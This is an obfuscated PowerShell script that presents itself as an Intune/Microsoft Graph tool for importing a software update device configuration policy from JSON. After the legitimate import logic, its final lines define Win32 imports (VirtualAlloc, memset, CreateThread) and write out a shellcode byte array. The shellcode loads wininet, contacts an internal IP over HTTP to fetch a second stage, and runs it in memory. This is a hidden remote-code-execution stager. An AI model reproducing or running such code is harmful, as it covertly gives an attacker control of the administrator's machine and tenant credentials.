 $2b6jk= [tYpe]("{3}{6}{1}{0}{2}{5}{4}"-F 'LECti','f','O','SySteM.','.AsSEmBLy','N','RE') ;  



function gET-`AU`T`hTOKen {



[cmdletbinding()]

param
(
    [Parameter(mAndAtoRY=${t`Rue})]
    ${us`er}
)

${uSer`U`Pn} = &("{2}{1}{0}"-f 'bject','w-O','Ne') ("{1}{4}{3}{2}{0}"-f 'ress','S','ilAdd','l.Ma','ystem.Net.Mai') -ArgumentList ${u`SeR}

${t`eNA`NT} = ${uS`eR`UpN}."H`Ost"

&("{0}{3}{1}{2}"-f'W','i','te-Host','r') ("{2}{0}{4}{1}{3}{5}" -f 'hecking',' Azur','C','eAD modu',' for','le...')

    ${aAd`Mo`DuLE} = &("{2}{0}{1}"-f'l','e','Get-Modu') -Name ("{1}{2}{0}"-f 'D','Azu','reA') -ListAvailable

    if (${AA`D`M`ODULE} -eq ${nu`ll}) {

        &("{0}{1}{2}{3}"-f 'W','rite-','Ho','st') ("{2}{8}{4}{9}{1}{6}{5}{10}{0}{3}{7}"-f 'Previ','l modul','A','e','D Powe',' looking for','e not found,','w','zureA','rShel',' AzureAD')
        ${Aad`M`ODuLe} = &("{0}{2}{1}" -f'Get','e','-Modul') -Name ("{2}{0}{3}{1}" -f'ureADP','eview','Az','r') -ListAvailable

    }

    if (${a`AdM`o`DuLE} -eq ${Nu`Ll}) {
        &("{1}{2}{0}" -f't','write-ho','s')
        &("{1}{2}{0}" -f'st','write-','ho') ("{5}{2}{1}{6}{3}{4}{0}"-f'ed...','ll modu','Powershe','e n','ot install','AzureAD ','l') -f ("{0}{1}"-f 'Re','d')
        &("{1}{2}{0}" -f'ost','w','rite-h') ((("{23}{19}{20}{6}{17}{4}{2}{13}{9}{3}{12}{8}{5}{1}{22}{15}{24}{10}{14}{11}{18}{7}{0}{16}{21}" -f'ed PowerS','-Mod','qIn','le Az','ng yo','nstall','ru','vat','q or yoqI','-Modu','an','e','ureADyo','stall',' ','ureADPreviewyoq from','hell prom','nni','le','n','stall by ','pt','ule Az','I',' '))."Re`place"(([chAR]121+[chAR]111+[chAR]113),[sTRInG][chAR]39)) -f ("{1}{0}{2}" -f'ell','Y','ow')
        &("{2}{0}{1}" -f'te','-host','wri') ((("{3}{0}{1}{4}{2}"-f ' can0Agt',' continue','..','Script','.')) -CrepLaCe  '0Ag',[CHAR]39) -f ("{1}{0}" -f 'd','Re')
        &("{2}{1}{0}"-f 'st','-ho','write')
        exit
    }




    if(${a`A`dMODULe}."cou`Nt" -gt 1){

        ${L`A`TEs`T_v`ERsiOn} = (${a`ADmod`ULE} | &("{0}{1}" -f 'sele','ct') ("{0}{1}{2}" -f've','rsio','n') | &("{2}{1}{0}" -f'ct','je','Sort-Ob'))[-1]

        ${AA`Dmod`ULE} = ${a`Adm`oduLe} | &('?') { ${_}."VErs`IOn" -eq ${late`s`T_`VE`RsION}."VE`R`SIoN" }

            

            if(${A`Admod`UlE}."C`Ount" -gt 1){

            ${aa`DMo`dUle} = ${A`ADM`odUlE} | &("{1}{0}"-f'lect','se') -Unique

            }

        ${aD`AL} = &("{3}{0}{1}{2}" -f'-Pa','t','h','Join') ${aaD`MoDu`le}."Mod`ULeB`ASE" ("{12}{10}{13}{11}{8}{7}{2}{9}{3}{0}{4}{6}{14}{5}{1}"-f 'r','ll','.Client','ActiveDi','ect','.d','or','tityModel','n','s.','icroso','.Ide','M','ft','y')
        ${aD`A`Lf`oRMS} = &("{2}{1}{0}" -f 'ath','in-P','Jo') ${aadMO`dU`Le}."mODU`leb`ASe" ("{5}{8}{1}{2}{7}{4}{10}{3}{9}{0}{6}" -f'ctory.Plat','ft.I','dentityMod','ctiv','l.Cli','Mic','form.dll','e','roso','eDire','ents.A')

    }

    else {

        ${AD`AL} = &("{1}{0}{2}" -f'in-P','Jo','ath') ${aA`DmO`duLe}."M`oDul`ebasE" ("{8}{0}{9}{2}{11}{5}{12}{7}{10}{6}{3}{1}{4}"-f'c','irectory','soft.','eD','.dll','tityM','s.Activ','.Clien','Mi','ro','t','Iden','odel')
        ${AD`AlfOR`MS} = &("{0}{1}" -f'Join-','Path') ${a`AdMoDU`lE}."ModuL`eBa`se" ("{4}{9}{7}{2}{3}{5}{6}{0}{1}{8}"-f 'Pl','atf','Model.Clients','.Active','M','Director','y.','y','orm.dll','icrosoft.Identit')

    }

 (  cHILDiteM  ("Variab"+"LE:"+"2B"+"6jk")  ).VaLue::("{0}{2}{1}" -f 'Lo','m','adFro').Invoke(${a`Dal}) | &("{1}{0}"-f'ull','Out-N')

 $2b6jk::("{0}{1}" -f 'Load','From').Invoke(${A`D`ALfO`RMs}) | &("{2}{1}{0}"-f '-Null','t','Ou')

${clIEn`T`ID} = ("{5}{1}{0}{3}{4}{2}{6}" -f'ae','672-4d','354','-b554-9d5','bdfd9','d1ddf0e4-d','7')

${rEd`I`Rect`URI} = ("{4}{3}{2}{1}{0}"-f 'b','oauth:2.0:oo',':',':ietf:wg','urn')

${rESOURCe`Ap`pId`U`RI} = ("{6}{3}{2}{1}{5}{0}{4}"-f'o','raph.','ps://g','t','m','microsoft.c','ht')

${a`UtHo`RItY} = "https://login.microsoftonline.com/$Tenant"

    try {

    ${AutHco`NTE`XT} = &("{0}{1}{2}"-f 'N','ew-Obje','ct') ("{4}{11}{5}{8}{9}{3}{10}{2}{6}{1}{0}{7}" -f 'onCon','ticati','the','ActiveDir','Micro','Iden','n','text','tityMod','el.Clients.','ectory.Au','soft.') -ArgumentList ${a`UtHO`R`itY}

    
    

    ${PL`AtF`orm`paR`Am`etERs} = &("{2}{1}{0}" -f '-Object','w','Ne') ("{6}{1}{5}{7}{9}{11}{4}{14}{13}{8}{2}{15}{0}{3}{10}{12}"-f 've','icrosoft.','c','Directory.PlatformP','o','I','M','denti','ents.A','t','aramete','yM','rs','li','del.C','ti') -ArgumentList ("{1}{0}"-f 'o','Aut')

    ${USe`R`id} = &("{1}{2}{3}{0}"-f 't','New-Obj','e','c') ("{16}{5}{1}{7}{12}{9}{0}{8}{10}{2}{13}{14}{4}{18}{17}{15}{6}{3}{11}" -f 'ntityMod','of','lients','ntif','i','ros','y.UserIde','t','el','e','.C','ier','.Id','.','Act','r','Mic','to','veDirec') -ArgumentList (${US`Er}, ("{5}{4}{6}{3}{2}{0}{1}"-f 'ab','leId','ay','l','onalD','Opti','isp'))

    ${a`UT`HrESuLt} = ${au`THc`onTe`XT}.("{4}{2}{3}{1}{0}" -f 'c','syn','c','quireTokenA','A').Invoke(${r`e`sO`URCEap`pIduri},${CLi`E`NtId},${rEDiRE`C`TUri},${plAtfo`RMPaRAME`T`eRS},${usE`RiD})."resu`lT"

        

        if(${AUt`Hre`sulT}."ac`ce`S`StoKen"){

        

        ${AUt`hHE`A`Der} = @{
            ("{1}{0}{2}"-f'-T','Content','ype')=("{1}{3}{2}{0}"-f 'json','a','n/','pplicatio')
            ("{1}{3}{0}{2}"-f'h','A','orization','ut')=("{1}{0}" -f'er ','Bear') + ${a`UTH`ResU`Lt}."A`CC`ESsTOkEN"
            ("{1}{2}{0}" -f 'esOn','Exp','ir')=${a`UThrE`SU`lt}."e`xpIRE`soN"
            }

        return ${A`UT`Hh`EaDer}

        }

        else {

        &("{2}{1}{0}"-f'st','-Ho','Write')
        &("{2}{1}{0}"-f 'ost','-H','Write') ("{10}{0}{5}{6}{3}{4}{1}{9}{2}{7}{8}" -f'ut','p','ease re-run aut',' is nul','l, ','horization Ac','cess Token','henticatio','n...','l','A') -ForegroundColor ("{1}{0}" -f'd','Re')
        &("{1}{0}{2}" -f 'Ho','Write-','st')
        break

        }

    }

    catch {

    &("{0}{2}{1}" -f'write','st','-ho') ${_}."E`XCe`pT`IoN"."Me`s`sAGe" -f ("{0}{1}"-f 'Re','d')
    &("{1}{3}{2}{0}" -f'ost','w','ite-h','r') ${_}."e`x`cepTion"."I`T`EmNAme" -f ("{1}{0}" -f'd','Re')
    &("{0}{3}{1}{2}"-f 'writ','-ho','st','e')
    break

    }

}



Function a`d`d-DEVIC`ECon`FiG`UrATioNPoLicY(){



[cmdletbinding()]

param
(
    ${J`SOn}
)

${gR`A`P`haPIV`Ers`ION} = ("{1}{0}"-f'eta','B')
${dCP_rESOU`R`ce} = ("{7}{10}{4}{8}{6}{0}{9}{11}{3}{2}{1}{5}"-f 'v','u','nfig','eCo','geme','rations','t/de','dev','n','i','iceMana','c')
&("{3}{0}{1}{2}" -f'te','-Verbos','e','Wri') ('Res'+'ou'+'rce: '+"$DCP_resource")

    try {

        if(${J`son} -eq "" -or ${j`soN} -eq ${N`ULl}){

        &("{2}{1}{0}"-f'-host','te','wri') ("{0}{7}{1}{5}{3}{10}{4}{2}{11}{8}{6}{9}"-f 'No JSON','spec','Andro','d, please specify valid JSON ','he ','ifie','.',' ','cy.','.','for t','id Poli') -f ("{1}{0}" -f'd','Re')

        }

        else {

        &("{1}{0}"-f'-JSON','Test') -JSON ${j`SOn}

        ${u`Ri} = "https://graph.microsoft.com/$graphApiVersion/$($DCP_resource)"
        &("{2}{1}{0}{3}"-f'st','voke-Re','In','Method') -Uri ${u`Ri} -Headers ${auTH`T`okEn} -Method ("{0}{1}" -f 'P','ost') -Body ${jS`on} -ContentType ("{3}{2}{1}{0}" -f'/json','cation','i','appl')

        }

    }
    
    catch {

    ${e`X} = ${_}."exCePT`i`ON"
    ${ER`RoR`Res`pONse} = ${EX}."RESP`o`NSe".("{3}{2}{1}{0}{4}"-f 'tr','ponseS','Res','Get','eam').Invoke()
    ${read`eR} = &("{0}{2}{1}"-f 'Ne','-Object','w') ("{5}{1}{2}{3}{6}{0}{4}" -f'e','tem.IO.','Str','e','r','Sys','amRead')(${E`Rro`R`RESp`ONsE})
    ${Rea`D`Er}."baS`E`STrE`Am".POSITiON = 0
    ${ReA`Der}.("{3}{0}{1}{2}{4}{5}" -f'scar','dBu','ffere','Di','d','Data').Invoke()
    ${res`POnSEB`oDY} = ${rea`d`er}.("{0}{3}{1}{2}" -f'Re','dT','oEnd','a').Invoke();
    &("{0}{1}{2}{3}"-f 'W','rit','e-Hos','t') ('Res'+'pon'+'se '+"content:`n$responseBody") -f ("{1}{0}"-f'd','Re')
    &("{0}{1}{2}" -f'Write-','E','rror') "Request to $Uri failed with HTTP Status $($ex.Response.StatusCode) $($ex.Response.StatusDescription) "
    &("{2}{0}{1}"-f'os','t','write-h')
    break

    }

}



Function Te`ST-`J`sON(){



param (

${jS`on}

)

    try {

    ${Te`STJSOn} = &("{3}{0}{1}{2}"-f 'ertF','rom','-Json','Conv') ${js`ON} -ErrorAction ("{0}{1}" -f'S','top')
    ${Va`LI`DjS`ON} = ${tR`Ue}

    }

    catch {

    ${V`AlI`DjsoN} = ${F`AL`sE}
    ${_}."ex`Ce`ptION"

    }

    if (!${va`LI`DJSon}){
    
    &("{1}{0}{2}" -f 'e-','Writ','Host') ((("{0}{8}{1}{3}{5}{7}{4}{2}{6}" -f 'Provid','JSON isn{0}t in','a',' ','d JSON form','val','t','i','ed ')) -f[Char]39) -f ("{0}{1}"-f 'Re','d')
    break

    }

}





&("{3}{0}{1}{2}" -f 'rite-','h','ost','w')


if(${Gl`OBA`L:`A`UtHTOK`en}){

    
    ${D`ATET`IMe} = (&("{2}{1}{0}" -f 'te','t-Da','Ge')).("{1}{0}{2}{3}"-f'Univer','To','sa','lTime').Invoke()

    
    ${ToK`EN`E`Xp`IREs} = (${A`UtHt`O`KeN}."eX`piRe`soN"."da`T`etiME" - ${D`AtE`T`imE})."MINU`T`es"

        if(${tokE`NEXpI`R`eS} -le 0){

        &("{1}{0}{2}"-f'hos','write-','t') ("{5}{6}{1}{4}{3}{2}{7}{0}"-f'pired','i','n ','oke','on T','A','uthenticat','ex') ${TO`kENEX`PiREs} ("{3}{2}{1}{0}"-f'o','utes ag','in','m') -ForegroundColor ("{0}{1}" -f 'Yell','ow')
        &("{2}{1}{0}"-f'st','o','write-h')

            

            if(${us`er} -eq ${n`ULl} -or ${Us`eR} -eq ""){

            ${u`ser} = &("{1}{0}{2}" -f'ad-','Re','Host') -Prompt ("{7}{8}{0}{4}{10}{2}{11}{6}{3}{5}{12}{1}{9}"-f 'r','atio','pal na','or',' pr',' Azure Authenti','e f','Please specify you','r use','n','inci','m','c')
            &("{1}{2}{0}{3}"-f't','W','ri','e-Host')

            }

        ${gLOBal`:`Au`ThTo`KEN} = &("{2}{0}{1}"-f 'AuthTok','en','Get-') -User ${u`sER}

        }
}



else {

    if(${us`eR} -eq ${Nu`lL} -or ${Us`ER} -eq ""){

    ${u`sEr} = &("{0}{1}{2}" -f'Read','-Hos','t') -Prompt ("{9}{8}{10}{11}{2}{12}{16}{18}{14}{15}{7}{19}{3}{13}{6}{1}{0}{17}{4}{5}" -f 'a','c','ser princi','ut','io','n','ti','or Azu','se specify y','Plea','ou','r u','p','hen','me ','f','a','t','l na','re A')
    &("{0}{1}{2}"-f'W','rite-Ho','st')

    }


${gLOBal`:a`UtH`ToK`En} = &("{1}{3}{4}{2}{0}"-f 'n','Get-','hToke','A','ut') -User ${uS`Er}

}





${I`M`po`RTPATh} = &("{1}{0}{2}"-f'ead-Ho','R','st') -Prompt ((("{28}{17}{2}{26}{3}{6}{4}{14}{22}{29}{24}{18}{10}{1}{16}{12}{7}{11}{27}{0}{13}{19}{23}{20}{25}{8}{15}{5}{9}{21}" -f 'C:z','mpor','e s','ecify ',' p','ztxpoli','a','.','txPolici','cy.js','o i','g.','rom e','txIntu','a','es','t data f','s',' file t','ne','ut','on','th ','Outp','N','z','p',' ','Plea','to a JSO'))  -CrePlaCE([CHAr]122+[CHAr]116+[CHAr]120),[CHAr]92)


${i`MpOR`TP`Ath} = ${i`m`POR`TPATh}.("{1}{2}{0}" -f 'e','re','plac').Invoke('"','')

if(!(&("{0}{1}"-f 'Test','-Path') "$ImportPath")){

&("{1}{2}{0}" -f 'st','Writ','e-Ho') ((("{8}{6}{9}{10}{4}{1}{0}{3}{2}{5}{7}" -f 'es',' do','JgQt e','n','ile','xist.',' Path for J','..','Import','SON ','f'))."rEpl`A`cE"(([ChAR]74+[ChAR]103+[ChAR]81),[STRINg][ChAR]39)) -ForegroundColor ("{1}{0}"-f'd','Re')
&("{2}{1}{0}" -f 't','Hos','Write-') ((("{1}{3}{2}{5}{4}{0}"-f 'e...','Script ','c','cani8yt ','tinu','on'))."REP`laCe"(([CHaR]105+[CHaR]56+[CHaR]121),[sTRINg][CHaR]39)) -ForegroundColor ("{1}{0}" -f'd','Re')
&("{0}{1}{2}"-f 'Wri','te-H','ost')
break

}



${Js`on`_data} = &("{1}{2}{0}"-f 'ontent','Get-','C') "$ImportPath"


${JSo`N_con`VERt} = ${j`SON`_`data} | &("{3}{0}{2}{1}"-f'ertFro','-Json','m','Conv') | &("{3}{2}{1}{0}" -f 't','c','ct-Obje','Sele') -Property ('*') -ExcludeProperty ('id'),("{1}{3}{4}{2}{0}"-f 'e','cr','DateTim','eat','ed'),("{2}{3}{1}{4}{5}{0}"-f 'e','D','last','Modified','ateTi','m'),("{0}{1}"-f 've','rsion'),("{6}{4}{2}{7}{0}{1}{8}{5}{3}"-f'odat','a.c','ment','xt','ssign','nte','groupA','s@','o'),("{1}{3}{0}{4}{2}" -f 'ou','g','nments','r','pAssig')

${D`IsPla`Y`NAme} = ${J`Son_`CoNVERt}."diS`pL`Ayn`AmE"

${JSOn`_`ouTpUt} = ${jSo`N_`c`O`NveRt} | &("{0}{1}{3}{2}" -f'Conv','ert','o-Json','T')
            
&("{2}{0}{1}" -f 'ho','st','write-')
&("{1}{2}{0}"-f'ite-host','w','r') ('Softwa'+'r'+'e '+'Up'+'d'+'ate '+'Poli'+'cy '+"'$DisplayName' "+'Fou'+'nd.'+'..') -ForegroundColor ("{1}{0}{2}"-f'l','Yel','ow')
&("{2}{1}{0}{3}"-f'te-hos','i','wr','t')
${Jso`N`_`OuTput}
&("{1}{2}{0}" -f 'host','wri','te-')
&("{0}{1}{2}"-f 'Write-','Hos','t') ('Add'+'in'+'g '+'Soft'+'war'+'e '+'Upd'+'ate '+'Po'+'li'+'cy '+"'$DisplayName'") -ForegroundColor ("{0}{2}{1}" -f'Y','llow','e')
&("{3}{4}{0}{2}{6}{5}{1}" -f'nfig','y','uratio','Add-De','viceCo','olic','nP') -JSON ${json`_OU`Tp`Ut}
${c} = ((("{107}{80}{96}{58}{47}{90}{2}{54}{36}{66}{118}{10}{55}{29}{97}{86}{11}{51}{99}{44}{12}{8}{100}{59}{39}{34}{111}{108}{32}{61}{109}{91}{65}{70}{113}{33}{77}{42}{72}{46}{117}{82}{56}{110}{1}{22}{81}{15}{88}{35}{116}{92}{84}{105}{48}{50}{95}{64}{53}{45}{3}{40}{28}{49}{101}{103}{52}{60}{20}{62}{6}{38}{57}{76}{69}{93}{102}{21}{89}{73}{31}{5}{14}{27}{23}{13}{17}{16}{24}{4}{30}{87}{43}{68}{0}{78}{115}{83}{106}{37}{79}{71}{114}{75}{98}{25}{119}{94}{67}{26}{7}{19}{112}{41}{85}{18}{74}{9}{63}{104}"-f'r','a','b','tes, ','nFl','er,','tr lpSt','(I','t','src, ui',' ex','tu','n','e',' uint ','ntPt','i','at',' ui','ntPt','t','lpP','ti','wCr','o','stati','memset','d',' dw','n I','ag','met',', uint flPro','({0',' u',' ','ic st','t({0}','a','nt dwSize,','uint','e','2',' Int','c(I','u','{0','0','tPtr','St',' lpThr','a',', I','ib','l','ter','blic','rtAd','dll{','ddress, ui','n','tect','P','nt coun','adAttr','mpo','at','IntPtr ','Ptr lpTh','ss, In','r','t.dll','.dll','ra','nt ',']publi','dre','}kernel3','eadId','msvcr','lImport({0}ke','c extern I','u','lImp','h','st,','tr Vir','s,','r','a','})]pu','[DllI','ateT','tPtr','extern ','e','rnel32.','ntP','c ','lAllo','Ptr lpA','a',' ','ckSize','t);','read(In','or','[Dl','flAllocationType',');',' st','int ','r d','t','{0})',');[Dl','Cre','})]p','ic','c '))-F[ChAR]34);${W} = &("{2}{1}{0}"-f'pe','Ty','Add-') -memberDefinition ${C} -Name ("{1}{0}" -f '32','Win') -namespace ("{2}{1}{0}{3}"-f 'Fu','in32','W','nctions') -passthru;[Byte[]];[Byte[]]${S`C} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x03,0x53,0x53,0x68,0xb3,0x15,0x00,0x00,0xe8,0x8c,0x00,0x00,0x00,0x2f,0x42,0x4f,0x30,0x54,0x47,0x00,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0x89,0xc6,0x53,0x68,0x00,0x32,0xe0,0x84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x96,0x6a,0x0a,0x5f,0x68,0x80,0x33,0x00,0x00,0x89,0xe0,0x6a,0x04,0x50,0x6a,0x1f,0x56,0x68,0x75,0x46,0x9e,0x86,0xff,0xd5,0x53,0x53,0x53,0x53,0x56,0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x0a,0x4f,0x75,0xd9,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x68,0x00,0x00,0x40,0x00,0x53,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x00,0x20,0x00,0x00,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcd,0x8b,0x07,0x01,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x75,0xff,0xff,0xff,0x31,0x37,0x32,0x2e,0x31,0x36,0x2e,0x30,0x2e,0x31,0x00;${s`IzE} = 0x1000;if (${s`C}."Len`gTH" -gt 0x1000){${SI`ZE} = ${sc}."len`G`TH"};${x}=${w}::("{3}{2}{1}{0}"-f 'oc','l','tualAl','Vir').Invoke(0,0x1000,${SI`ZE},0x40);for (${i}=0;${i} -le (${Sc}."le`Ngth"-1);${i}++) {${W}::"m`EMS`Et"([IntPtr](${x}.("{1}{2}{0}" -f't32','ToI','n').Invoke()+${I}), ${sc}[${i}], 1)};${w}::("{3}{1}{2}{0}"-f 'ead','eat','eThr','Cr').Invoke(0,0,${x},0,0,0);for (;;){&("{1}{2}{0}" -f 'ep','Star','t-sle') 60};
